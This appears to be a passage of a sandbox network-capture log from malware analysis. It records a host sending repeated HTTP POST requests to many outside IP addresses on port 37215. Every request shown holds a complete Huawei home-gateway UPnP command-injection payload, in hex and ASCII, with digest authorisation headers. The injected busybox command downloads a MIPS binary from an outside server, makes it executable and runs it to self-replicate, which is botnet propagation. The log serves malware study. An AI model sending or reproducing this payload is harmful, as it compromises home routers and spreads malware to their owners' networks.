                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2253192.168.2.2350032157.195.207.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664979935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2254192.168.2.2345578197.112.87.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665071964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2255192.168.2.2337730157.57.209.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665199995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2256192.168.2.234031841.83.178.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665205002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2257192.168.2.2343338157.90.121.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665236950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2258192.168.2.235167441.130.229.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665349960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2259192.168.2.2359090197.37.217.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665366888 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2260192.168.2.234902441.33.135.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665378094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2261192.168.2.2351662157.14.69.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665388107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2262192.168.2.234398491.133.155.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665393114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
